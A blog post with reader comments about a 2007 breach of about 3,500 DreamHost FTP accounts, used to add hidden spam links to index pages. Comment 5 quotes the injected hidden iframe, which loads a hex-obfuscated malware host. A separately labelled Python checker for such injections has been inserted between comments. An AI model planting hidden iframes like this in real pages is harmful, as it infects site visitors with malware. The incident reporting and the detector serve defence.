DreamHost FTP Accounts Hacked

Within the last 2 weeks approximately 3,500 DreamHost users have had their FTP account passwords stolen and about 20% of the affected users have had some of their files altered.

The users were notified of this security breach by DreamHost staff today:

From: DreamHost Security Team
Subject: URGENT: FTP Account Security Concerns…

Hello -

This email is regarding a potential security concern related to your
‘XXXX’ FTP account.

We have detected what appears to be the exploit of a number of
accounts belonging to DreamHost customers, and it appears that your
account was one of those affected.

We’re still working to determine how this occurred, but it appears
that a 3rd party found a way to obtain the password information
associated with approximately 3,500 separate FTP accounts and has
used that information to append data to the index files of customer
sites using automated scripts (primarily for search engine
optimization purposes).

Our records indicate that only roughly 20% of the accounts accessed -
less than 0.15% of the total accounts that we host – actually had
any changes made to them. Most accounts were untouched.

We ask that you do the following as soon as possible:

  1. Immediately change your FTP password, as well as that of any other accounts that may share the same password. We recommend the use of passwords containing 8 or more random letters and numbers. You may change your FTP password from the web panel (“Users” section, “Manage Users” sub-section).

  2. Review your hosted accounts/sites and ensure that nothing has been uploaded or changed that you did not do yourself. Many of the unauthorized logins did not result in changes at all (the intruder logged in, obtained a directory listing and quickly logged back out) but to be sure you should carefully review the full contents of your account.

Again, only about 20% of the exploited accounts showed any
modifications, and of those the only known changes have been to site
index documents (i.e. ‘index.php’, ‘index.html’, etc – though we
recommend looking for other changes as well).

It appears that the same intruder also attempted to gain direct
access to our internal customer information database, but this was
thwarted by protections we have in place to prevent such access.
Similarly, we have seen no indication that the intruder accessed
other customer account services such as email or MySQL databases.

In the last 24 hours we have made numerous significant behind-the-
scenes changes to improve internal security, including the discovery
and patching to prevent a handful of possible exploits.

We will, of course, continue to investigate the source of this
particular security breach and keep customers apprised of what we
find. Once we learn more, we will be sure to post updates as they
become available to our status weblog:

http://www.dreamhoststatus.com/

Thank you for your patience. If you have any questions or concerns,
please let us know.

Evidence suggests that the attack has targeted websites with a high Google PageRank and that the attacker has used his access to add a number of hidden spam links to the bottom of the affected pages in order to increase search engine rankings.

Prominent blogs like mezzoblue (PageRank 8), Crooked Timber (PageRank 7) and Caydel’s SEO Blog (PageRank 6) have been affected.

DreamHost has not yet made public how the attacker gained access to the server, but some users think that this afternoon’s upgrade of WebFTP might be related.

Hattip: Jeffrey R.

Updated 16:08: DreamHost has just posted about the security breach at the DreamHost Status Blog.

Updated Thursday 18:49: More info on the status blog. Other web hosts have been attacked as well. Affected users who have not yet changed their passwords will be forced to do so before they will be able to upload anything again.

Updated Friday 17:12: It’s now possible to disallow FTP logins to force users to use SSH and/or SFTP.

Updated Monday 15:17: New blog post about the Web Hosting Break-Ins at the Status Blog.

12 Responses to “DreamHost FTP Accounts Hacked”

  1. Caydel says:

    Hello, and thanks for the link.

    I would like to quickly challenge your assumption that “Evidence suggests that the attack has been targeted websites with a high Google PageRank”

    Homepages such as http://vanderveenfamily.net/ (PR 2), http://www.allaboutdolphins.net/ (PR 2), among other low-PR pages were hacked, along with several ‘in-development’ sites running on unpublished subdomains.

    I think the spammer just randomly searched for index.* files, and worked from there.

    Thanks again,

    Brian (Caydel)

  2. Kevin Fox says:

    I can’t speak as to the average, but my PR 7 site was one of those hacked.

  3. Mike says:

    Just a quick note:

    approximately 3,500 DreamHost users have had their FTP account passwords stolen

    To avoid confusion with the DH wording:

    approximately 3,500 separate FTP accounts

    Keep in mind that an L4 account can have up to 775 FTP users and even the L1 plan can have up to 75. I think many people are taking the 3,500 number as the number of customers affected.

    Just something to consider, especially since a lot of people resell on DH and could be running 1 domain per FTP user. Then add in those that create users for friends, family members, etc… or even just different users for their own domains.

    Personally, I’m more disturbed by them having panel access, than I am by the FTP stats… but that’s just me. ;-)

  4. Will says:

    They’ve also removed the password from being shown when you click on a user. However, the one for the mysql user is still shown.

  5. danielsemper says:

    I suffered from 2 different changes.

    1.- The spam links
    2.- An IFRAME code that goes to a web page with trojans and viruses that made my friends reinstall Windows. You have a black screen after you open the page with IE6 and that’s it.

    The code inserted in my index.html and index.php files was this one:

    <IFRAME src='http://0xcb.0xdf.0x9e.0x0c/t' width='6' height='6' style='visibility: hidden;'>

    So this action is not for PR, is just evil.
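As an added example (not code from the blog post, from DreamHost or from any commenter), a small Python checker for the review step the DreamHost email asks for: run over each index.* file, it flags content appended after the closing </html> tag, hidden containers such as the spam-link blocks described in the post, and hidden or tiny iframes like the one in the comment above, decoding hosts written as hex octets into dotted decimal. The sample page and its 0x7f.0x00.0x00.0x01 host are constructed for the example.

```python
import re

# Patterns for the tampering described on this page: hex-octet hosts,
# hidden containers and hidden/tiny iframes injected into index files.
HEX_OCTET = r"0x[0-9a-fA-F]{1,2}"
HEX_HOST_RE = re.compile(rf"^{HEX_OCTET}(?:\.{HEX_OCTET}){{3}}$")
TAG_RE = re.compile(r"<(iframe|div|span)\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""")
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)

# Constructed sample (not a real page or indicator): a clean page followed by
# a hidden spam block and a 6x6 hidden iframe whose host is spelled in hex.
SAMPLE_INDEX = (
    "<html><body><h1>My site</h1></body></html>\n"
    "<div style=\"display:none\"><a href=\"http://spam.example/\">cheap pills</a></div>\n"
    "<iframe src='http://0x7f.0x00.0x00.0x01/t' width='6' height='6' "
    "style='visibility: hidden;'></iframe>\n"
)

def decode_hex_host(host):
    """'0x7f.0x00.0x00.0x01' -> '127.0.0.1'; None if not four hex octets."""
    if not HEX_HOST_RE.match(host):
        return None
    return ".".join(str(int(o, 16)) for o in host.split("."))

def parse_attrs(raw):
    """Map lower-cased attribute names to values for one tag's attribute text."""
    return {k.lower(): (sq or dq or bare) for k, sq, dq, bare in ATTR_RE.findall(raw)}

def find_suspicious(html):
    """Return (kind, detail) findings for the contents of one index file."""
    findings = []
    end = html.lower().rfind("</html>")
    if end != -1 and html[end + 7:].strip():  # data appended after the real end
        findings.append(("trailing-content", html[end + 7:].strip()[:60]))
    for m in TAG_RE.finditer(html):
        tag, a = m.group(1).lower(), parse_attrs(m.group(2))
        hidden = bool(HIDDEN_RE.search(a.get("style", "")))
        if tag == "iframe":
            dims = [a.get(d, "") for d in ("width", "height")]
            tiny = all(d.isdigit() and int(d) <= 10 for d in dims)
            if hidden or tiny:
                host = re.sub(r"^[a-z]+://", "", a.get("src", ""), flags=re.I).split("/")[0]
                findings.append(("hidden-iframe", decode_hex_host(host) or host))
        elif hidden:
            findings.append(("hidden-block", m.group(0)[:60]))
    return findings

if __name__ == "__main__":
    for kind, detail in find_suspicious(SAMPLE_INDEX):
        print(f"{kind}: {detail}")
```

A clean file yields no findings, so the same function can be run unattended over every index.* file in an account after a password change.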

  6. Daniel says:

    It would be nice if we had a list of the hacked server names…

  7. Tim says:

    Looks like DreamHost upgraded the WebFTP (which is located with the panel for your domain).

  8. fuck dreamhost says:

    they also manually close your ftp and http without warning!!!

  9. Unofficial DreamHost Blog says:

    fuck dreamhost – If your password has been compromised I think it is very responsible to close access to your FTP account. It was always warned about on the status blog:

    We are now forcing all of the affected users who have not yet changed their passwords to do so before they will be able to upload anything again. This is necessary so we can continue to monitor the situation and see clearly what’s going on.

  10. Linked from: DreamHost Newsletter - July 2007

  11. Neuville says:

    Hello There,
    I’m not with dreamhost, but my website was hacked exactly the same way. I’m hosted at Aruba, an Italian provider, and running WordPress.

    The hacks have happened since I upgraded to wp 2.2.1

    Any idea on how to solve this? I deleted the hack lines in the index.php yesterday night, but this morning they were there again. I’ve already asked to change my ftp password and am waiting for a response from the people at Aruba

  12. Linked from: 3500 DreamHost Müşterisinin Şifreleri Çalındı!